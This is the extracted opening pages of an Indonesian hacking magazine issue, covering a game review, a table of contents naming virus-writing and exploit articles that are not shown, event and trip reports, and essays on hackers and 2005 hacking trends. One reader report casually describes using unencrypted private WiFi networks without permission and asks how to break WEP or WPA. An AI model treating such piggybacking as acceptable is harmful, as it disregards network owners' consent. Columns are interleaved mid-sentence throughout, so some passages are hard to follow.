NeoTek Vol. IV - No. 11 by odyxb

VIEWS: 1,393 PAGES: 48

More Info
									                 NeoSoft



                                             Empire Earth II
                    Build an Empire That Spans the Ages
    Empire Earth II dari Sierra Entertainment (www.sierra.com) persembahan game terbaru yang
    merupakan lanjutan dari seri pertamanya, mungkin akan mengikuti jejak terdahulunya menjadi
    game paling sukses se-antero jagat. Keunggulan yang dimiliki oleh game ini dibanding dengan
       yang pertama adalah kemampuan 3D-nya yang membuat kita bisa melihat ke segala arah.
                                        Keunggulan lain adalah..., mau tahu? Jajal segera game ini.

      erang..., lagi-lagi perang. Tapi perang yang      game ini. Ada lagi keunggulannya, tidak menuntut
 P    akan anda temukan jika memainkan game ini
      berbeda. Kok beda? Yah jelas saja beda, ini
                                                        akan kebutuhan konfigurasi komputer yang tinggi,
                                                        seperti Pentium II 350 ternyata ok juga. Tapi makin
hanya game atau permainan yang mengambil cerita         baik konfigurasi komputer anda akan makin mantap
perang. Jadi tidak perlu takut, tegang boleh karena     hasil yang didapat.
memang menegangkan dan seru sekali.                     Jika anda pernah memainkan game Rise of Nation
Pendidikan Sejarah Dunia                                yang dikeluarkan oleh Microsoft, terkesan ada
Hari gini... masih main ular tangga? Ampun..., segera   kemiripan sequelnya walau tidak begitu banyak.
beralih ke game ini. Apa untungnya main game ini?       Ketika dicari tahu siapa pembuatnya ternyata yang
Pertanyaan yang bagus, dan inilah jawabannya. Ga-       membuat game Rise of Nation adalah orang yang
me ini mengambil setting sejarah mengenai perada-       sama yang membuat game Empire Earth II ini. Nah
ban manusia dari dahulu hingga ke jaman modern          ini yang akan membuat anda terbius jika main
                                                        game ini, karena Rise of Nation terbilang sukses
                                                        kehadirannya karena setting sejarah yang dikemas
                                                        dalam bentuk game memang asyik untuk disimak
                                                        secara langsung didepan mata.




                                                        Requirements:
                                                        Windows 98/ME/2000/XP
                                                        Multimedia PC with Pentium II
                                                        350 MHz or higher processor
                                                        64 MB of RAM
                                                        Super VGA monitor supporting 1024 x 768 resolution
                                                        AGP (4 MB) or PCI (8 MB) 3D video card that supports 1024 x
                                                           768, 16-bit color resolution
                                                        Microsoft Mouse or compatible pointing device
                                                        DirectX-compatible sound card with speakers or headphones
                                                           recommended.



sekarang ini. Cerita mengenai bangsa yang meluas-
kan kekuasaannya untuk menjadi pemimpin semua
bangsa yang ada di bumi ini. Hitung-hitung sambil
belajar sejarah dunia dari kekuasaan Romawi, Turki,
Mongolia, dan lain-lain. Jadi seperti menonton sia-
ran Discovery Channel. Selain itu kita akan menge-
nal peralatan perang yang kuno sampai kepada
yang mutakhir sekarang ini.
Keunggulan Seri ke-2
Game ini bisa dibilang sebagai game penyempurnaan
dari seri pertamanya, dilengkapi kemampuan 3D
dimana kita bisa melihat ke segala arah yang me-
mungkinkan. Untuk kemampuan ini diharuskan
untuk menggunakan wheel mouse.
Keunggulan lainnya ada pada grafis dimana gambar
lebih halus dan jernih, itu yang membuat anda nan-
tinya akan beda di depan komputer ketika mencoba
                                                                                  HomePage
Harga NeoTek + CD:




                                                          Salam!
Rp22.000,- (P. Jawa)
Rp22.000,- (Luar P. Jawa)

NEOTEK
Dunia Teknologi Baru

                                          Windows Security:
          Footprinting          Dari Scumware sampai Worm

           Scanning



         Enumeration



        Gaining Access


           Escalating          ? Pengguna Windows lebih banyak dari pengguna Linux atau OS lainnya, dibalik itu ada
            Privilege                                                             bahaya yang sedang mengintai.




                               W
                                         indows bukan lagi operating system yang baru,
            Pilfering                    hampir diseluruh dunia orang mengenalnya dan
                                         bahkan menggunakannya karena kemudahan da-
                               lam mengoperasikannya, maka Windows dicap sebagai
                               Operating System yang Friendly User.
        Covering Tracks        Kejayaan yang terbesar yang pernah dimiliki oleh Bill
                               Gates raja Microsoft yang sekarang ini mulai memasuki
                               relung-relung bisnis high-end. Kejayaan Bill Gates sedang
            Creating           di uji, dengan begitu banyaknya hadir virus yang menye-
           Backdoors           rang komputer-komputer yang menggunakan Windows.
                               Waspadailah..., apalagi anda pengguna Windows.
                               Redaksi
           Denial of
            Service            redaksi@neotek.co.id

                               Bagaimana menghubungi NEOTEK?
Lengkapi pengetahuan hacking
dan PC security anda dengan     KONTRIBUSI ARTIKEL
berlangganan majalah NeoTek:    redaksi@neotek.co.id                      ADMINISTRASI IKLAN
                                SURAT PEMBACA                             Tel. 021-5481457   Fax. 021-5329041
Hubungi                         support@neotek.co.id                      SIRKULASI NEOTEK
Aswan Bakri                                                               Tel. 021-5481457
                                WEBMASTER
Tel. (021) 5481 457             webmaster@neotek.co.id                    ALAMAT REDAKSI
HP. (0812) 9572043 (Aswan)                                                4 Cairnhill Rise
                                PEMASARAN
email:                          Hedhi Sabaruddin, 0812-1891827            #05-01 The Cairnhill
                                                                          Singapore 229740
aswan_bakri2001@yahoo.com       CHATROOM DI DALNET                        Telp. +65-67386482
Kontak: Aswan Bakri             #neoteker                                 email: kosasih@indo.net.id
                                MILIS PARA NEOTEKER
                                http://groups.yahoo.com/group/majalahneotek

                                                                                  Vol. IV No. 11 NeoTek         1
         Daftar Isi
                   Daftar Isi




                                         NeoTek Vol. IV No. 11
                                                FOKUS VOL. IV NO. 11
                                                FOKUS VOL. IV NO. 11              16      Social Engineering
                                                                                         Teknik Hacking yang berba-
                                                                                  haya dan sulit ditanggulangi.


                                                                                  18      Membuat Virus 486
                                                                                         Belajar membuat virus dengan
                                                                                  Assembly Langguage Programming.



                                                                                       NeoTutor
    WINDOWS SECURITY
            SECURITY
    Worms - Scumware - UtilMan
                       UtilMan                                                    24      eMbedded VB:
                                                                                          Aplikasi Plot3D
                                                                                  Membuat aplikasi 3 dimensi yang
                                                                                  sederhana dengan rumus matematika.


    NeoRubrik                                 NeoStart                            26      eMbedded VB:
                                                                                          Aplikasi Puzzle
                                                                                  Membuat aplikasi game puzzle seder-
    6     Kontribusi Hacker
        Keberadaan Hacker antara         9      Internet Worms
                                                 Memahami lebih jauh menge-
                                                                                  hana yang mengasyikkan.

Pro dan Kontra, tetap saja memiliki
kontribusi yang penting untuk
                                        nai cacing komputer yang sebenarnya
                                        memiliki nama keren yaitu Autonomous      28      eMbedded VB:
                                                                                          Aplikasi TicTacToe
perkembangan komputer.                  Intrusion Agents.                         Melengkapi bahasan membuat game
                                                                                  di Pocket PC yang sederhana dan
    7     Hacking Trend 2005
        Catatan kecil mengenai isu      14      ScumWare
                                                 Biasa berselancar di Internet?
                                                                                  mengasyikkan.



                                                                                       NeoStyle
Hacking yang akan menjadi trend di      Inilah bacaan yang penting sebelum
tahun 2005.                             anda berhadapan dengan ScumWare.




Situs NeoTek                                          www.neotek.co.id
                                                                                  45      Photo Editing:
                                                                                          Clone Effect
                                                                                  Melakukan manipulasi photo dengan
 Jadikan situs NeoTek sebagai pangkalan Anda berselancar
                                                                                  memberi effect tertentu ternyata dapat
 Link Langsung                          Layanan Rupa-rupa NeoTek                  membrikan hasil yang memuaskan.
 Kunjungi situs-situs yang dibahas di   Channel #neoteker di Dalnet
 majalah NeoTek dengan sekali klik
 lewat situs NeoTek.
                                        Ngobrol ramai-ramai sesama NeoTeker
                                        Web Chat Room                             46      SwishMax:
                                                                                          Presentasi Animasi
                                        Kini tidak usah jauh-jauh untuk ngobrol   Membuat makalah presentasi plus
 NeoTek versi PDF                       langsung dengan sesama NeoTeker
 Kehabisan NeoTek di kota Anda?                                                   dengan animasinya.
 Dapatkan saja versi PDF-nya.           Mailing List
                                        Ini yang paling ramai. Segera ikutan
                                        berbagi pengalaman berinternet!
 Download
 Tersedia juga download di situs        NeoTeker Official Portal
 NeoTek selain dari situs aslinya       http://www.neoteker.or.id
                                        Situs komunikasi antar Neoteker.
                                        Neoteker Internet Radio
                                        http://dj.neoteker.or.id:8000

2       NeoTek Vol. IV No. 11
                                                                                         Daftar Isi

                                         33      Windows Security:
                                                 KeePass Password
                                                 Safe
                                                                                 NeoSoft
                                                                                          Empire Erath II
                                         Menggunakan password yang berbe-
                                         da untuk tiap account yang dimiliki       0      Build an Emeperor
                                         seringkali merepotkan. Trik berikut               War game dengan setting
                                         dapat membantu anda.                              sejarah perkembangan
                                                                                           peradaban manusia.

                                         34      Windows Security:
                                                 Gaining Access Tool
                                         AccessDiver, tool yang berguna ketika   NeoProfil
    NeoTekno                             mencapai tahapan Gaining Access
                                         dalam anantomi proses hacking.
                                                                                   3
                                                                                          Editorial Office
                                                                                           4 Cairnhill Rise

                                         35      Windows Security:                         #05-01 The Cairnhill
19      HoneyPot:
        Anti-Spam Berbasis                       Utility Manager                           Singapore 229740
                                                                                           Telp. +65-67386482
        Java                                     Exploit
Bahasan lanjutan mengenai Honeypot,      Menambah dan memperbaiki Utility                 Business Office
membuat Anti-Spam berbasis Java.         Manager Local Exploit yang dimiliki              Gedung Cahaya Palmerah 503
                                         oleh WinXP.                                      Jl. Palmerah Utara III No. 9

22      HoneyPot:
        HoneyPot dengan
                                         39      Computer Security:
                                                                                          Jakarta 11480
                                                                                          Telp. 021-5481457
        Phyton                                   Port dan bahayanya                       Fax. 021-5329041
Bahasan lanjutan mengenai Honeypot,      Mengenal port lebih jauh berikut
membuat Honeypot menggunakan             bahayanya yang memanfaatkan port                  Pemimpin Umum
Phyton.                                  sebagai jalan penyerangan.                        Fachri Said
                                                                                           Pemimpin Redaksi
29      Windows Security:
        Utak-Atik User
                                                                                           Kosasih Iskandarsjah
                                                                                           Redaktur Ahli
        Account                                                                            Onno W. Purbo
Membahas sekuritas dan efektifitas                                                         Michael S. Sunggiardi
yang berkaitan dengan User Account.
                                                                                           Pemimpin Usaha

31      Windows Security:                                                                  Fahmi Oemar
                                                                                           Dadang Krisdayadi
        Solusi Puisi Cinta
Mengatasi virus puisi cinta yang cukup                                                     Redaktur Pelaksana
membuat panik jika tidak tahu cara                                                         MA Rody Candera
mengatasinya.                                                                              Sekretaris Redaksi
                                                                                           Marni
 NeoRagam                                         NeoTek Vol. IV No. 12                    Webmaster
                                                                                           Supriyanto
  4      Klak Klik
         Empire Earth
           Build an Emperor
                                         Sisi Gelap Peer-to-peer
                                         File Sharing                                      Sirkulasi
                                                                                           Hedhi Sabaruddin
           That Spans the Ages           Masih ingat dengan Napster?
         Cerita dari Singapura           Sharing file mp3 yang pernah ada                  Adm. Langganan
                                         yang kini sudah enghilang karena                  KRISHNAdiSTRIBUTOR

  5
         Seminar Hacking Overview        dianggap melanggar Hak Cipta.                     Iklan dan Promosi
            18Desember 2004              Bagaimana sistem file sharing hadir?              Gianto Widianto
            UIN Jakarta                  Tunggu bahasan yang akan datang
                                                                                           Keuangan
         Laporan WiFi di Taiwan          yang akan mengungkap rahasia
            Oleh: Imam Isrowi (Tenaga    tersebut berikut sisi gelap yang                  Aswan Bakri
            Kerja Indonesia di Taiwan)
                                         menyertai sistem ini.
                                                                                 Bank
                                         Linux File Sharing
 44 Daftar Isi CD-NeoTek - -Java
                                                                                 Bank BNI
    SpyRemoval HoneyPot                  Melakukan file sharing dari Linux ke    a.n. PT NeoTek Maju Mandiri
      - Smartphone Program eVB           Windows, apakah mungkin? Jawaban-       No. rekening 070.001709720.001
           Source Code - eVB             nya adalah mungkin. Tunggu bahasan
                                                                                 Bank Central Asia
           PaperWhite - Pocket PC        ini dan anda akan membuktikannya        (khusus untuk langganan)
           program - Empire Earth II     ternyata bisa dilakukan.                Aswan Bakri
           Demo Version.
                                                                                 No. rekening 0940544131

                                                                                         Vol. IV No. 11 NeoTek      3
                   NeoRagam


    Klak Klik                   CERITA DARI SINGAPORE

GAME BULAN INI                   I    ni laporan hasil perja-
                                      lanan Neotek ketika
Empire Earth II
Build an Emperor                kunjungan ke Singapura.
                                Negara kecil tapi memiliki
93.3 MB                         tingkat perekonomian yang
                                baik dan bisa dikatakan ne-
    Dari awal peradaban
     manusia, keinginan         gara maju.
untuk memperluas kekua-         Berbicara TI (Teknologi In-
saan sudah ada walaupun         formasi), Singapura tidak
harus dengan jalan perang.      tertinggal bahkan produk-
Games yang mengambil            produk yang dihasilkan
setting dari sejarah ini as-    oleh teknologi yang caggih
yik untuk dimainkan, me-        seperti saat sekarang ini
nguji kemampuan anda            cepat hadir memenuhi pa-
sebagai pemimpin suatu          sar dan menemani gaya hi-
bangsa untuk menunduk-          dup warga Singapura. Up-
kan bangsa lain. Menjadi                                        School of Information Technology, Nanyang Polytechnic. Program
                                grade wawasan mengenai          pendidikan setingkat diploma untuk jurusan teknologi digital
bangsa pemimpin seluruh         TI, Singapura lebih dekat       entertainment. Di Indonesia ada Digital Studio.
bangsa yang ada di bumi.        dijangkau dari Indonesia.
Berawal dari jaman yang         Oleh sebab itu, jika anda       net untuk perusahaan ber-          logi yang nanti hasilnya
masih sederhana perala-         ingin menyadari bahwasan        beda sedikit saja dengan           dibutuhkan oleh industri,
tan perangnya sampai            bahasan teknologi yang di-      biaya yang ditetapkan ISP          kini membuka jurusan ba-
menuju masa modern              miliki Neotek selalu lebih      yang ada di Indonesia, tapi        ru yang diberi nama Digi-
dengan peralatan perang         cepat dibanding majalah         biaya akses internet untuk         tal Entertainment Techno-
canggih.                        lain yang berbendera tek-       personal ini yang bikin ke-        logy. Jika di Indonesia ada
                                nologi. Sebagai Contoh,         jutan. Hanya $80/bulan             Digital Studio.
                                Bluetooth. Pertama kali Neo-    (dengan hitungan kurs              Digital Entertainment
                                tek membahas Bluetooth          Rp5.400,00 jadi total biaya        Technology memakai tek-
                                yaitu 4 tahun yang lalu         bulanan untuk akses inter -        nologi informasi untuk
                                (Volume I). Beruntunglah        net di Singapura bagi peng-        menciptakan dan mema-
                                anda pembaca setia Neotek.      guna personal yaitu                sang hiburan, seperti efek
                                                                Rp432.000,00), kita sudah          visual, animasi dan per-
                                Akses Internet                  dapat menikmati akses in-          mainan komputer.
                                Berbicara mengenai ini yang     ternet Unlimited dengan
                                bikin iri kita pada Singa-      kecepatan 1500 Mbps (1,5           Anda tertarik? Buka situs-
                                pura. Kapan yach Indonesia      Gbps).                             nya di www.nyp.edu.sg dan
                                bisa seperti Singapura me-                                         ternyata di Singapura ba-
                                                                Nanyang Polytechnic                nyak orang Indonesia juga
                                ngenai akses internet?
                                                                NYP (Nanyang Polytechnic),         yang suka berbelanja kare-
                                Di Singapura, pengguna          salah satu perguruan tinggi        na relatif murah, katanya
                                akses internet dibagi men-      yang ada di Singapura yang         gitu...
                                jadi 2 yaitu personal (peng-    interest terhadap pendidikan
                                guna rumahan) dan peru-         yang memanfaatkan tekno-
                                sahaan. Biaya akses Inter-


- Win 95/98/NT/XP
- DirectX 8.0 or Direct-X
  compatible SVGA videocard
- Pentium 950 MHz or higher
- 64 MB RAM
- Super VGA monitor
  supporting 1024 x 768
  resolution
- AGP (4 MB) or PCI (8 MB) 3D
  video card that supports
  1024 x 768, 16-bit color
  resolution
- Microsoft Mouse or
  compatible pointing device
- 32x CD ROM drive




                                                                                                           Kampus modern Nanyang
                                                                                                           Polytechnic, Singapura..

4       NeoTek Vol. IV No. 11
                                                                                                        NeoRagam

SEMINAR HACKING OVERVIEW DI UIN (UNIVERSITAS ISLAM NEGERI) JAKARTA

 H    acking Overview. Be-
      gitu topik seminar
                                  Bellua Asia Pasifik sebagai
                                  Information Security
                                                                     Antusias Peserta                    Acara berakhir sukses dan
                                                                                                         banyak cerita yang terukir,
                                                                     Antusias peserta terhadap
yang diadakan oleh Badan          Consultant juga ikut ambil         acara terlihat sangat positif       tunggu berita kegiatan para
Eksekutif Mahasiswa UIN           bagian membagikan penge-           dan baik sekali, terbukti           NeoTeker mengisi waktu
Jakarta pada tanggal 18           tahuannya kepada peserta.          dengan penuhnya kursi               dengan kegiatan positif.
Desember 2004.                    Peserta akhirnya tidak ha-         yang ada dan juga ternyata          Yes Hacking and No Drugs
Menambah Wawasan                  nya saja tahu apa itu dan          peserta wanita tidak kalah          Berikut adalah orang-orang
                                  ini tentang hacking tetapi         jumlahnya dibanding pe-             yang terlibat mendukung
Acara ini diadakan bertu-         juga plus mengetahui arah
juan untuk menambah wa-                                              serta pria. Acara yang dimu-        acara:
                                  hacking itu nantinya jika          lai pada pukul 09.30 WIB
wasan mengenai hacking,           berkeinginan terjun seba-                                              Pembicara:
oleh sebab itu topik yang                                            dan berakhir pada sore ha-
                                  gai professional worker.           rinya mendekati pukul               1. A. Zakaria
dipilih yaitu Hacking                                                                                    2. Ody
Overview.                         Dani Firmansyah menyem-            17.30, ternyata tidak me-           3. Jim Geovedy
                                  patkan diri hadir di acara         mungut biaya yang tidak
Acara ini dikemas dengan                                                                                 Demo:
                                  tersebut, menambah nilai           mahal alias murah dan sa-
melibatkan NeoTeker baik          tersendiri bagi peserta ter-       ngat terjangkau bagi kan-           1. Andi Ismayadi
sebagai pembicara maupun          hadap sosok yang sempat            tong mahasiswa. Ada yang            2. Beta Andri
sebagai demo hacking. Jim                                                                                3. Ricky
                                  menggegerkan TI KPU.               pernah jadi mahasiswa?              4. Yoki S
Geovedi, yang aktif pada




                                                                     Seminar Hacking Overview di Universitas Islam Negeri Jakarta yang
                                                                     melibatkan NeoTeker sebagai pembicara. Acara juga dihadiri oleh
                                                                     ‘sesepuh’ hacking Indonesia seperti Dani Firmansyah dan Jim Geovedi.



Laporan WiFi (2,4 GHz) di Taiwan                                                   Imam Isrowi (imamisrowi@yahoo.co.uk)


 S     aya menyampaikan ten-
       tang Wifi (Frek 2,4 Ghz
                                  cara telepon pakai Handphone
                                  selama 1 menit ke nomor ter-
                                                                     AP/SSID yang di proteksi, se-
                                                                     ring kita diminta setting Proxy.
                                                                                                         Kami juga selalu cek berita
                                                                                                         terakhir di www.airputih.or.id
di Taiwan khususnya wilayah       tentu, dan akan dikirimi SMS       Ada yang tahu cara masuk            dan kami rangkum, kami foto
Taichung (Taiwan Tengah).         berisi Username dan Password.      atau bobol WEP or WPA? Ka-          copy dan kemudia kami sebar-
                                  satu menit telepon kita diberi     lau mau benar-benar FREE,           kan ke teman-teman TKI di
Saya berkeliling di Taichung
                                  20 Menit OnLine. Jadi setelah      kita pergi ke kampus atau se-       Taiwan atau di pasang di papan-
dalam radius 2 Km persegi
dengan membawa PDA ber-           connect dengan SSID Mobitai,       kolah yang dipasang Hotspot         papan pengumuman yang ada
                                  maka akan muncul halaman           Outdoor Free. Browsing se-          di warung-warung Indonesia
wifi. Ternyata banyak sekali
                                  login di Browser kita. Baru ki-    puasnya, dan kecepatannya           di Taiwan.
Hotspot, AP atau SSID yang
saya jumpai. Dalam area ter-      ta menelpon 1 menit, dan 5 de-     sangat memuaskan. Setelah           Sekian laporan kami, atas per-
                                  tik kemudian kita sudah men-       Icon Connect muncul, kita
sebut, di pusat bisnis elektro-                                                                          hatian rekan-rekan, kami ucap-
                                  dapat Username dan Password.       langsung bisa browsing.
nik yang paling banyak AP.                                                                               kan terima kasih. Salam dari
Sepertinya private AP. Jadi       Setelah kita masukkan, kita        Kapan ya negeri kita bisa se-       kami, TKI Taiwan.
                                  sudah bisa browsing 20 menit.
jangkauannya tidak jauh. Hal                                         perti ini. Rasanya jadi betah
ini ditunjukkan kalau kita pin-   Jika kita jalan-jalan ke Aparte-   tinggal di negeri orang.
dah tempat, maka AP (SSID)        men yang kira-kira ada WiFi,                                           Informasi tambahan
                                                                     Kami sedang mengumpulkan
tersebut tidak terdeteksi lagi    disana akan ditemukan banyak                                           Laporan lainnya mengenai
                                                                     dana bantuan untuk saudara
alias hilang.                     sekali AP Private. Yang ternyata   kita di Aceh. Kami didukung         WiFi di Taiwan pernah di
                                  kadang-kadang tidak di pro-                                            muat di majalah NeoTek Vol.
Namun yang paling kuat daya                                          oleh Palang Merah Taiwan
                                  teksi (Encrypt). Kita tinggal                                          IV No. 09, di bagian NeoInbox
pancarnya ada 2 Hotspot Out-                                         (Taichung), sehingga kami ju-
door. Yaitu Easy-Up dan           nyantol saja maka kita sudah       ga boleh menerima sumbangan         (Neoteker Menjawab
                                  bisa browsing sepuasnya.                                               Neoteker).
Mobeelan (SSID=Mobitai).                                             dari orang Taiwan. Rencana-
Namun keduanya bayar alias        Tapi jika yang punya tahu ada      nya akhir bulan ini kita akan
langganan, tapi masih mem-        yang nyantol, maka AP dima-        kumpulkan jadi satu seluruh
berikan akses Free dengan         tikan. Dan bila menemukan          Taiwan atas nama TKI Taiwan.


                                                                                                        Vol. IV No. 11 NeoTek           5
                 NeoRubrik


KONTRIBUSI HACKER DALAM PERKEMBANGAN KOMPUTER

                                Pro dan kontra terhadap keberadaan hacker antara pandangan negatif
                                dan pandangan yang positif, menghadirkan deretan panjang daftar
                                pertanyaan-pertanyaan yang membutuhkan jawaban sebagai solusi.
                                Dani Firmansyah (xnuxer@yahoo.com) mengupas Hacker yang
                                sesungguhnya demi menyatukan persepsi kita bersama mengenai
                                hacker berikut kontribusinya dalam perkembangan komputer yang
                                sekarang ini anda rasakan sendiri nilai plus dari kemajuan komputer
                                bersama internet didalamnya.




K      EMAJUAN TEKNOLOGI INFORMASI
        yang sangat pesat saat ini masih
        mempertanyakan keberadaan
                                           di sebuah jaringan atau sistem komputer.
                                           Persepsi pertama tentu negatif karena
                                           melihat sosok hacker dari tindakannya
                                                                                      kecuali jika Anda siap untuk kehilangan
                                                                                      asset Anda yang nilainya besar itu.
                                                                                      Sedikit saran untuk para kalangan bis-
hacker bagi beberapa kelompok masya-       yang seringkali membobol sistem kom-       nis yang menggantungkan assetnya
rakat yang kurang mendapatkan infor-       puter milik orang lain walaupun sebe-      pada seutas kabel di komputer yang
masi lengkap tentang siapa sebenarnya      narnya penulis yakin orang yang me-        datanya berseliweran di jaringan kom-
yang dimaksud dengan hacker dan            mahami persepsi ini juga tidak menge-      puter, perlu dipahami bahwa data loss
peran yang dimainkannya bagi kema-         tahui apakah si hacker itu merusak         bisa terjadi oleh beberapa hal dianta-
juan teknologi informasi.                  atau tidak. Persepsi kedua terkesan po-    ranya karena virus, aplikasi yang error,
Susah memang kalau sebuah persepsi         sitif karena yang dilihat adalah kemam-    sistem yang tidak bekerja maksimal,
yang sudah terbentuk di masyarakat         puan yang dimiliki oleh hacker itu sen-    gangguan fisik dan teknis akibat sistem
dimana kini menjadi patokan dasar un-      diri menurutnya hebat dan sangat ahli.     yang tidak di-manajemen dengan baik,
tuk memahami siapa sebenarnya hacker       Perbedaan persepsi inilah terkadang        kelemahan penerapan policy keamanan,
itu. Ada yang harus dipahami kembali       menjadikan keberadaan hacker masih         serta serangan-serangan dari intruder
bahwa hacker itu bukanlah sebuah pe-       sering ditakuti oleh beberapa kelompok     di jaringan.
ngakuan dari orang yang jago kompu-        masyarakat bisnis. Mungkin juga ka-        Hacker professional dapat menawar-
ter tapi lebih kepada pemberian pang-      rena si pemilik usaha/bisnis terlalu se-   kan konsep dan metode yang lebih
kat atau gelar bagi orang-orang yang       ring mendengarkan berita di media          baik dalam soal keamanan jaringan di
sangat mahir dan berbakat dalam hal        tentang hacker yang suka menyerang         sistem yang Anda miliki karena meto-
pemrograman dan teknologi jaringan.        dan sering terlalu kreatif menembus        dologi risk assassment (analisa dampak
Pertanyaannya, kenapa hanya pemro-         sistem-sistem level keamanan kom-          & kerusakan sistem) yang diterapkan
gramman dan jaringan? Tentu yang           puter di jaringan.                         hacker menggunakan patokan dasar
harus dimengerti bahwa kemajuan            Hacker tidak selalu menyerang tapi juga    security (advisory) yang tiap hari ter-
teknologi komputer dan telekomuni-         sangat paham dengan metode defensif        update (tiap hari para hacker professional
kasi terbentuk karena daya olah atau       dan banyak memiliki solusi dalam           mendapatkan report dari komunitas
kreatifitas manusia dalam memprogram       bertahan di jaringan internet yang liar,   security internasional tentang bug-bug
sebuah sistem dan aplikasi. Kemajuan       bahkan sebenarnya hacker memiliki          di sistem komputer), dan hacker profes-
teknologi komunikasi sekarang ini ju-      kode etik yang ketat dan salah satu kode   sional jelas memiliki standarisasi secu-
ga merupakan hasil dari olah kreatifi-     etiknya adalah memberitahu kepada          rity yang jelas dalam mengamankan
tas manusia dalam teknologi jaringan.      pemilik sistem akan adanya lubang/bug      jaringan karena dia memiliki sistem
Tidak dapat di pungkiri keberadaan tek-    security di sistem yang dia analisa.       policy dan network policy yang lebih
nologi internet merupakan hasil kontri-    Maka jangan heran bila beberapa hacker     baik karena didukung resources dan
busi dari para hacker di seluruh dunia,    profesional lebih terbuka untuk            keahlian yang dia miliki.
dengan ketrampilannya mampu me-            menjalin komunikasi dengan system          Sudah saatnya bagi kalangan bisnis un-
nyambungkan elektron-elektron me-          administrator sebuah perusahaan, dan       tuk memberikan kesempatan bagi para
lalui kabel dan media udara (ether) ke     sebenarnya keduanya bisa saling ber-       hacker untuk terjun di dunia IT secara
dalam digit-digit data yang dapat di-      kolaborasi dan bekerja sama dalam          terbuka dan proffesional agar aktifi-
mengerti oleh sistem komputer.             membangun sistem pertahanan yang           tasnya dalam menyalurkan adrenalin
Bicara tentang persepsi hacker, saat ini   lebih baik. Hacker profesional lebih       di jaringan internet yang liar bisa le-
ada 2 pendapat yang muncul di masya-       senang jika di panggil sebagai WhiteHat    bih tersalurkan secara positif dan pe-
rakat dan kedua pendapat itu saling        atau dalam istilah umum pakar              nulis yakin akan banyak manfaat
bertentangan. Bagi orang yang awam         keamanan jaringan dan bukan hacker         yang bisa diambil karena terbukti
teknologi (gaptek) akan melihat sosok      karena dia konsisten dengan profesinya     keberadaan internet yang dibuat oleh
hacker sebagai tokoh hitam yang ja-        sementara julukan hacker hanya             para hacker hingga saat ini berkem-
hat, pekerjaannya hanya merusak sis-       merupakan pemberian (assign) dari          bang menjadi teknologi yang luar
tem komputer orang lain. Sementara         komunitas. Bagi kalangan bisnis            biasa dan sangat membantu aktifitas
pendapat yang lain mengatakan bahwa        sebenarnya keberadaan hacker bisa di       telekomunikasi yang mana memba-
hacker adalah jagoannya komputer           manfaatkan untuk mengamankan asset-        ngun effektifitas dan effesiensi kerja.
yang bisa menembus lapisan sekuriti        asset perusahaan yang nilainya
                                           mungkin bisa ratusan milyar perhari

6    NeoTek Vol. IV No. 11
                                                                                              NeoRubrik

HACKING TRENDS 2005

                                Memasuki dan mulai sedikit demi sedikit menapaki tahun 2005, tahun
                                2004 kini sudah berada di belakang. Mengamati perkembangan
                                Internet yang terus melaju, masalah hacking sudah pasti hal yang asyik
                                untuk diperbincangkan. Jim Geovedi (jim.geovedi@bellua.com)
                                membeberkan catatan kecilnya mengenai Trend Hacking Tahun
                                2005, khusus untuk dibagikan kepada para pembaca NeoTek.




 S     ELAMAT   TAHUN BARU 2005. Ti-
        dak terasa saat ini kita sudah
        berada di tahun 2005. Sembari
                                           perhatian extra, terlebih dari mereka
                                           yang menyimpan data penting dan
                                           rahasia. Hal lain yang memicu adalah
                                                                                     sity (www.rwth-aachen.de) yang
                                                                                     mempresentasikan metode hacking
                                                                                     dengan judul
menyelesaikan beberapa tugas, saya         tingginya aksi penyerangan dan
menyempatkan diri untuk membuat            pengerusakan dengan menggunakan           0wn3d by an iPod: Firewire/1394 Issues
catatan kecil mengenai trend hacking       SQL injection pada tahun lalu.            (md.hudora.de/presentations/#firewir
tahun ini berdasarkan informasi yang                                                 e-pacsec) pada konferensi PacSec.jp
saya kumpulkan dari berbagai sumber        3. Honeypot Hacking
                                                                                     (www.pacsec.jp) pada bulan Novem-
di Internet.                               Honeypot adalah sebuah resource           ber 2004 lalu.
Hacking selalu menjadi isu yang me-        yang dipergunakan untuk mempela-
                                           jari "blackhat." Pada dasarnya sebuah     Tahun 2005 diperkirakan trend hard-
narik. Namun apakah yang menjadi                                                     ware hacking akan meningkat. Salah
trend di tahun 2005 ini? Mari kita         honeypot adalah sebuah sistem kom-
                                           puter yang tidak memiliki nilai lebih     satu contohnya adalah
simak beberapa topik hacking yang
saya prediksikan akan menjadi trend        dan diharapkan tidak ada seorang pun      USB DMA Attack
di tahun 2005 ini.                         yang memiliki ketertarikan padanya,
                                           sehingga kalau ada seorang yang ter-      yang akan dipresentasikan David Maynor
1. Web Systems Hacking                     tarik, sepertinya orang tersebut ter-     (www.bellua.com/bcs2005/asia05.spea
                                           tarik untuk kepentingan yang ilegal.      kers.html#david) pada konferensi
Pada pertengahan tahun 2004, peris-
tiwa defacement pada website tabulasi      Dari sisi eksternal, agak sulit dibeda-   Bellua Cyber Security 2005
nasional Pemilu 2004 (tnp.kpu.go.id)       kan antara honeypot dan sistim            (www.bellua.com/bcs2005)
dari KPU menjadi headline news di          komputer biasa. Sehingga identifikasi     di Jakarta pada bulan Maret 2005.
banyak media lokal maupun interna-         sebuah sistim adalah sebuah honeypot      Topik hardware hacking lain yang
sional.                                    diperkirakan akan menjadi trend           tidak kalah menariknya adalah
Pernyataan bahwa firewall dapat me-        tahun 2005 ini.                           Bluetooth (www.defcon.org/html/
lindungi serangan hacker terpatahkan       4. Passive Information Gathering          defcon-12/dc-12-speakers.html#
begitu saja karena penyerang meman-                                                  laurie) hacking.
faatkan protokol yang firewall-friendly.   Information gathering adalah tahap
Web attacks dapat melintasi firewall       awal sebuah proses hacking. Pada
begitu saja karena memang bukan tu-        acara DEFCON 12 (www.defcon.org),         Jim Geovedi kini aktif sebagai
gas firewall untuk melakukan inspeksi      Johnny Long (johnny.ihackstuff.com)       Information Security Consultant
content dari setiap packet terutama        mempresentasikan metode passive           pada PT Bellua Asia Pacific.
pada protokol yang diijinkan melintas.     information gathering menggunakan
                                           search engine.
Seiring dengan semakin banyaknya
pemanfaatan aplikasi web seperti web       Ada banyak metode pencarian yang
forum, news/articles publishing tools,     bisa diperoleh dari websitenya. Dan
dan lain-lain. Maka tahun 2005 ini,        pada tahun 2005 ini, metode penca-
diperkirakan proses auditing dari web      rian secara pasif akan semakin
codes akan mendapat perhatian yang         berkembang lagi.
sangat tinggi.                             5. Hardware Hacking
2. Database Hacking                        Pernah berpikir untuk menggunakan
Jika pada tahun-tahun sebelumnya           iPod (www.apple.com/ipod) untuk
